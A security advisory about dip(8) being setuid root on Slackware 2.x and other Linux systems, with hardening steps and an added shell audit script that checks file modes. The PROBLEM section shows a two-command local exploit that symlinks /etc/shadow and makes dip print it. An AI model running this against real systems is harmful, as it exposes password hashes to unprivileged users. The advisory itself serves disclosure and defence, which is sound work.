COMMAND

    dip(8)

SYSTEMS AFFECTED

    Slackware 2.0, 2.1, 2.2, 2.3. Other Linux systems.

PROBLEM

    dip(8) is installed setuid root and world executable by default.
    This allows a user to read any file on the system.

	$ ln -s /etc/shadow /tmp/dummy.dip
	$ /sbin/dip -v /tmp/dummy.dip
	[ Shadow password file and some garbage ]

SOLUTION

    Turn off the setuid bit on dip. Change its group to modem and
    chmod it to 2110. Then chgrp all your /dev/ttyS* and /dev/cua*
    files to modem and chmod them all to 660. You may need to do the
    same with your getty, pppd, and dialout programs.
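
    The following audit script is an added example, not part of the
    original advisory. It checks a system against the state described
    under SOLUTION. The function names are hypothetical and GNU stat is
    assumed; /sbin/dip and the device globs are taken from the advisory.

```shell
#!/bin/sh
# Added example: audit for the configuration described in this advisory.
# Function names are hypothetical; paths and modes come from the advisory.

# classify_dip MODE OWNER GROUP  (MODE is octal, as printed by `stat -c %a`)
classify_dip() {
    case $1 in *[!0-7]*|'') echo INVALID; return 0 ;; esac
    perm=$((0$1))
    if [ $((perm & 04000)) -ne 0 ] && [ "$2" = root ]; then
        # setuid root: the condition the PROBLEM section describes
        if [ $((perm & 0001)) -ne 0 ]; then
            echo VULNERABLE      # world executable as well
        else
            echo REVIEW          # setuid root, but not world executable
        fi
    elif [ "$perm" -eq $((02110)) ] && [ "$3" = modem ]; then
        echo HARDENED            # setgid modem, mode 2110, no setuid bit
    else
        echo REVIEW              # neither the default nor the recommended state
    fi
}

# classify_tty MODE GROUP: serial devices should be mode 660, group modem
classify_tty() {
    case $1 in *[!0-7]*|'') echo INVALID; return 0 ;; esac
    if [ $((0$1)) -eq $((0660)) ] && [ "$2" = modem ]; then echo OK; else echo REVIEW; fi
}

# audit_dip_setup [DIP_PATH]: report on the live system (GNU stat assumed)
audit_dip_setup() {
    dip=${1:-/sbin/dip}
    if [ -e "$dip" ]; then
        set -- $(stat -c '%a %U %G' "$dip")
        echo "$dip: mode=$1 owner=$2 group=$3 -> $(classify_dip "$1" "$2" "$3")"
    else
        echo "$dip: not installed"
    fi
    for dev in /dev/ttyS* /dev/cua*; do
        [ -e "$dev" ] || continue
        set -- $(stat -c '%a %G' "$dev")
        echo "$dev: mode=$1 group=$2 -> $(classify_tty "$1" "$2")"
    done
}

# Run the audit only when asked, e.g.: sh audit_dip.sh --audit
if [ "${1:-}" = "--audit" ]; then audit_dip_setup; fi
```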